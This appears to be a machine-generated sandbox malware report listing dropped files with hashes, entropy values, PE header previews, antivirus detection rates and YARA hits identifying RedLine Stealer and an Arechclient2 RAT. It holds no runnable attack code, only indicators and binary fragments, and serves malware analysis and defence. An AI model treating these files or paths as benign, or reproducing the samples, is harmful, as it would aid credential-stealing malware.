                                                                                                                                                      Preview:[04/27/24 02:20:46] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/27/24 02:20:48] IsValidCommunication : Result := True...
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):608080
                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: VucRf0jboS.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: kO1P1YnLst.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: wxfSIz4PAi.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: JHqNlw9U8c.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: QPoX60yhZt.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: 3R18jv6iGv.exe, Detection: malicious, Browse
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):450024
                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                      Malicious:false
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):257872
                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):80880
                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                      Malicious:false
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):410
                                                                                                                                                      Entropy (8bit):5.361827289088002
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
                                                                                                                                                      MD5:812F0A8C671812AA613FC139B69E8614
                                                                                                                                                      SHA1:B4177437C50B25B06FB885362DA36FD171A1C5A9
                                                                                                                                                      SHA-256:6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
                                                                                                                                                      SHA-512:6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):685392
                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):608080
                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):450024
                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                      Malicious:false
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):257872
                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):545792
                                                                                                                                                      Entropy (8bit):6.384805269039956
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
                                                                                                                                                      MD5:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                      SHA1:D5927B38A32E30AFCF5A658612A8266476FC4AD8
                                                                                                                                                      SHA-256:64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
                                                                                                                                                      SHA-512:355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 72%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):80880
                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                      Malicious:false
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.0.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):545792
                                                                                                                                                      Entropy (8bit):6.384805269039956
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
                                                                                                                                                      MD5:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                      SHA1:D5927B38A32E30AFCF5A658612A8266476FC4AD8
                                                                                                                                                      SHA-256:64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
                                                                                                                                                      SHA-512:355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 72%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1514213
                                                                                                                                                      Entropy (8bit):7.762279979167416
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:PL8X8agz3LJ/97RhYDqexjSsnzZySqrl0mfFcN5HC90vdb0icsSStMVADbgcjj/:gRCPneBtLmw5i90R2s4AP1jj/
                                                                                                                                                      MD5:5BCD410B842DEDA0076155B57A6DA08A
                                                                                                                                                      SHA1:BDC1CBFF9B4D3D5B4EDC086ECE0120223A00E517
                                                                                                                                                      SHA-256:1AA33A598D00D9B48BCFF3A33DC49FE988871B5B9A5F07A62D502A8670ED7AD7
                                                                                                                                                      SHA-512:7DC5369510CBB566F68738598315CC211CD5D3E14E56CD9215BE319B1153EFEA4700E71ACF511716A8295D3566EEEFED30D53AAF671A7FEC5B6550934C99FFD3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FP.............4>.. %../?..1"..20..f...3...)6..+"..20..3!.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..)...28../+..>Q.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..)...'%..("..(2..FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..........8..)"..2.......'<..)#..FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ..t..sa.qQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.FQ.
                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):786944
                                                                                                                                                      Entropy (8bit):6.809298494568767
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
                                                                                                                                                      MD5:5AEBA331CE853D10C82B56ADC96C9E80
                                                                                                                                                      SHA1:A208059F9591712ABF451114815B693AB14A5AB3
                                                                                                                                                      SHA-256:EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
                                                                                                                                                      SHA-512:5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, Author: Joe Security
                                                                                                                                                      • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\bxhlahunbhc, Author: ditekSHen
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                      • Antivirus: Virustotal, Detection: 61%, Browse
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1514213
                                                                                                                                                      Entropy (8bit):7.762278385224484
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:JL8X8agz3LJ/97RhYDqexjSsnzZySqrl0mfFcN5HC90vdb0icsSStMVADbgcjj/:eRCPneBtLmw5i90R2s4AP1jj/
